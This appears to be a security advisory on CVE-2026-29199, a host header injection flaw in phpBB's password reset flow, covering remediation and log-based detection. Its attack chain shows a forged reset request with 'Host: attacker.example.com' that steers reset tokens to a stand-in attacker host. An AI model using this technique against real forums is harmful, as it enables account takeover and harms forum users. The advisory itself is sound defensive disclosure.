phpBB Password Reset Flow Vulnerable to Host Header Injection
phpBB, one of the world's most widely deployed open-source forum platforms, is affected by CVE-2026-29199, a high-severity host header injection vulnerability in its password reset flow. The flaw allows an unauthenticated attacker to manipulate the HTTP Host header to poison the reset link URL embedded in password reset emails, redirecting victims to an attacker-controlled server where the secret reset token can be captured.
The vulnerability carries a CVSS score of 8.1 and affects all phpBB versions before 3.3.16. Users should upgrade immediately to phpBB 3.3.16 or later.
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29199 |
| CVSS Score | 8.1 (High) |
| Affected Versions | phpBB < 3.3.16 |
| Patched Version | phpBB 3.3.16 |
| Attack Type | Host Header Injection → Password Reset Link Poisoning |
| Condition | force_server_vars must be disabled (default in many installs) |
| Authentication Required | None |
| User Interaction | Required (victim clicks poisoned link) |
| Disclosure Date | May 4, 2026 |
How the Attack Works
Root Cause
phpBB's password reset mechanism constructs the reset URL by reading the server hostname from the HTTP Host request header when the configuration option force_server_vars is disabled. This configuration is disabled by default on many installations, particularly those behind reverse proxies that forward the original client-supplied Host header without stripping or validating it.
An attacker can forge the Host header in a password reset request to inject an arbitrary hostname. phpBB will then construct a reset link using that attacker-supplied hostname and include it in the email sent to the victim.
Attack Chain
1. Attacker identifies a valid user account on the target phpBB forum
2. Attacker sends a password reset request with a forged Host header:
POST /ucp.php?mode=sendpassword HTTP/1.1
Host: attacker.example.com
3. phpBB reads the Host header and builds the reset URL:
https://attacker.example.com/ucp.php?mode=activate&code=SECRET_TOKEN
4. phpBB emails the victim the poisoned reset link
5. Victim clicks the link — browser contacts attacker.example.com
6. Attacker captures SECRET_TOKEN from the request log
7. Attacker uses the token against the real phpBB forum to reset the password
8. Full account takeover achieved without knowing the victim's current credentialsWhy force_server_vars Matters
When force_server_vars is enabled, phpBB uses the admin-configured server name and port from the board settings rather than trusting the HTTP Host header. This prevents injection. However, many forum administrators either leave this disabled (the default in some deployment scenarios) or are unaware of its security significance.
Installations sitting behind reverse proxies such as Nginx, Apache, Caddy, or Traefik are particularly at risk if the proxy does not sanitize the Host header before forwarding requests to phpBB.
Affected Deployments
| Scenario | Risk Level |
|---|---|
phpBB with force_server_vars disabled, behind proxy that forwards Host | High — vulnerable |
phpBB with force_server_vars disabled, direct internet exposure | High — vulnerable |
phpBB with force_server_vars enabled | Mitigated |
| phpBB 3.3.16 or later | Patched |
| Proxy strips and re-sets Host to known hostname | Mitigated |
Remediation
Option 1: Upgrade to phpBB 3.3.16 (Recommended)
The patch in phpBB 3.3.16 restricts which values are accepted for building reset URLs. Upgrade your phpBB installation immediately.
# Download phpBB 3.3.16
wget https://www.phpbb.com/files/release/phpBB-3.3.16.zip
# Extract over existing installation (backup first)
unzip phpBB-3.3.16.zip
# Run the update script via your browser
# Navigate to: https://yourforum.example.com/install/Option 2: Enable force_server_vars
Until you can upgrade, enable force_server_vars in your phpBB Admin Control Panel:
- Log in to the Admin Control Panel (ACP)
- Navigate to General → Server Configuration → Server Settings
- Set "Force server URL settings" to Yes
- Ensure Server name, Server port, and Script path are correctly configured
- Save changes
This forces phpBB to use the admin-configured values rather than the HTTP Host header.
Option 3: Sanitize Host Headers at the Proxy Layer
Configure your reverse proxy to strip the incoming Host header and replace it with the canonical server name:
# Nginx — rewrite Host to known canonical hostname
proxy_set_header Host "yourforum.example.com";# Apache mod_proxy
ProxyPassReverse / http://phpbb-backend/
RequestHeader set Host "yourforum.example.com"Detection
Review your web server logs for password reset requests (/ucp.php?mode=sendpassword) that include a Host header differing from your forum's legitimate domain:
# Nginx — detect anomalous Host headers on password reset endpoint
grep 'ucp.php.*sendpassword\|mode=sendpassword' /var/log/nginx/access.log | \
grep -v '"Host: yourforum.example.com"'
# Apache — look for reset requests with suspicious referer or host
grep 'sendpassword' /var/log/apache2/access.logAlso check outbound email logs for password reset emails sent to users around unexpected timestamps — a sudden burst could indicate an active attack campaign.
Impact Assessment
phpBB powers a significant portion of the world's online forums and community platforms, many of which remain self-hosted by individuals and small organizations without dedicated security teams. The combination of a high CVSS score, no authentication requirement, and a simple single-HTTP-request attack vector makes this vulnerability highly accessible to automated exploitation at scale.
Community forum accounts often aggregate years of private messages, financial discussions, and sensitive community data — making account takeover via poisoned reset links a meaningful real-world threat.